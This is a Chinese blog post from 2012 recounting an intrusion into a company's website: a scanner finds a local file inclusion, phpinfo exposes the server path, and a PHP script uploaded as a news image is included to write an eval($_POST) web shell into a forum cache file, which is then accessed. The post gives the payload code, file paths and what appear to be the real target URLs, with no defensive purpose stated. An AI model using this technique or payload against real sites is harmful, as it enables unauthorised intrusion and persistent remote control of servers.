文件包含漏洞对公司测试

主站是:www.xxxx.biz
环境:linux php nginx,伪静态的。
主站基本是没希望,不过xss很多,懒得去利用。
有公司有一个新新业务,所以开发部门建立了一个新的网站,所以我也就..........开始看了下dz 7.5的,自己修改了一些东西,尝试了公开的0DAY没戏,各种尝试无果。

最后丢到wvs里面一扫,一会就出来了一个本地包含漏洞,详细继续。

根据WVS扫描结果,漏洞发生在以下页面:
&id=17
这是一个很明显的本地文件包含漏洞
bendibaohan.png
但是这个漏洞使用相对路径来进行包含是不成功的,要使用绝对路径,在以下文件发现phpinfo信息
http://www.cntuike.net/info.php

发现网站绝对路径为
/data0/htdocs/www.dxg.com/view/

于是用WVS的HTTPEDITOR进行访问

3212323.jpg

图片1.png
此时你已经发现info.php已经被成功包含并执行了

接下来要构造你自己的webshell,通常情况下就是通过上传。在网站上发现了注册会员服务,注册一个账号之后,在用户中心的企业新闻里面新增一个新闻,然后上传一个内容是:


<?php
$fp = @fopen("/data0/htdocs/www.dxg.com/view/bbs/forumdata/cache/cache_1.php", 'a');
@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[chen]);'."\r\n\r\n?".">\r\n");
@fclose($fp);
?>

上传成功后可以看到是一个相对路径

图片2.png

/uploads/contentImg/news/201204/10/133404553855857.jpg

将两者合并起来
/data0/htdocs/www.dxg.com/view/uploads/contentImg/news/201204/10/133404553855857.jpg

于是再用WVS访问

3221.jpg

成功之后直接访问
http://www.cntuike.net/bbs/forumdata/cache/cache_1.php

图片3.jpg

3212323.jpg (12.07 KB)

 

3212323.jpg

 

posted on 2012-11-22 01:49  =_=!  阅读(408)  评论(0编辑  收藏  举报

导航